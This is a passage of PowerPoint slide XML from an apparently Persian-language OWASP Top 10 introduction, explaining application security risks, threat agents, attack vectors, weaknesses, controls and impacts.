                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>جدید</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fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>جامعه</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fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </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6876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fa-IR" sz="4000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>توجه</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>توجهات این نسخه</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2652647" y="8190079"/>
            <a:ext cx="93040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472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3510183554"/>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7372">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>خطرات امنیتی برنامه چیست؟</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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3991063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مهاجمان به طور بالقوه می‌توانند از راه‌‌های مختلفی از طریق برنامه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> کاربردی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> شما، به کسب و کار یا سازمان شما آسیب</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> برسانند</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>. هر یک از این راه‌ها بیانگر یک خطر است که ممکن است به اندازه کافی جدی باشد تا به آن توجه شود.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>گاهی اوقات این مسیرها بسیار راحت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> مشخص می‌شوند</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> و گاهی اوقات بسیار دشوار است. به طور مشابه، آسیب ناشی از آن ممکن است هیچ نتیجه ای نداشته باشد، یا ممکن است شما را از کسب و کار بیرون کند. برای تعیین خطر برای سازمان شما می توانید احتمال را با هر عامل تهدید، بردار حمله و ضعف امنیتی مرتبط کنید و آن را با برآورد اثرات فنی و تجاری سازمان خود ترکیب کنید. این عوامل با هم، ریسک کلی شما را تعیین می کنند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="322433" y="1757050"/>
            <a:ext cx="6154567" cy="2115831"/>
            <a:chOff x="322433" y="2086463"/>
            <a:chExt cx="6154567" cy="2104537"/>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fa-IR" sz="9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rPr>
                  <a:t>ضعف</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fa-IR" sz="10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rPr>
                <a:t>حمله</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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17" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="322433" y="2089172"/>
              <a:ext cx="481222"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fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>عاملان</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>تهدید</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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fa-IR" sz="10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rPr>
                <a:t>اثر</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endParaRP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fa-IR" sz="10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rPr>
                  <a:t>ضعف</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fa-IR" sz="9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rPr>
                <a:t>حمله</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41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1428233" y="2100347"/>
              <a:ext cx="574196"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fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>بردارهای</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>حمله</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2817192" y="2089173"/>
              <a:ext cx="598241"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fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>ضعف‌های</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>امنیتی</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4737665" y="2114036"/>
              <a:ext cx="506870" cy="301351"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>تاثیرات</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>فنی</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5856121" y="2086463"/>
              <a:ext cx="506870" cy="301351"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>تاثیرات</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>تجاری</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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fa-IR" sz="9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rPr>
                <a:t>حمله</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fa-IR" sz="9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rPr>
                <a:t>اثر</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fa-IR" sz="9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rPr>
                <a:t>اثر</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fa-IR" sz="10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rPr>
                <a:t>دارایی</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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fa-IR" sz="10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rPr>
                <a:t>کارکرد</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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fa-IR" sz="10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rPr>
                <a:t>دارایی</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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endParaRP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fa-IR" sz="9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rPr>
                  <a:t>ضعف</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fa-IR" sz="10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rPr>
                <a:t>کنترل</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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fa-IR" sz="10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rPr>
                <a:t>کنترل</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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endParaRP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fa-IR" sz="10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rPr>
                <a:t>کنترل</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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endParaRP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fa-IR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                    <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                  </a:rPr>
                  <a:t>ضعف</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44844" y="2086463"/>
              <a:ext cx="635110"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fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>کنترل‌های</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>امنیتی</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textplatzhalter 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1800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fa-IR" sz="2400" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مخاطره</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مخاطرات امنیتی برنامه‌های کاربردی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 177"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2909074782"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5268034"/>
          <a:ext cx="4509120" cy="4637966"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4509120">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="337493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ریسک من چیست؟</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4300473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> به شناسایی جدی ترین خطرات برای مجموعه وسیعی از سازمان ها متمرکز است. برای هر یک از این خطرات، ما اطلاعات کلی درباره احتمال و تأثیر فنی را با استفاده از رهنمود ساده ارزیابی می کنیم که بر اساس روش رتبه بندی ریسک </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fa-IR" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
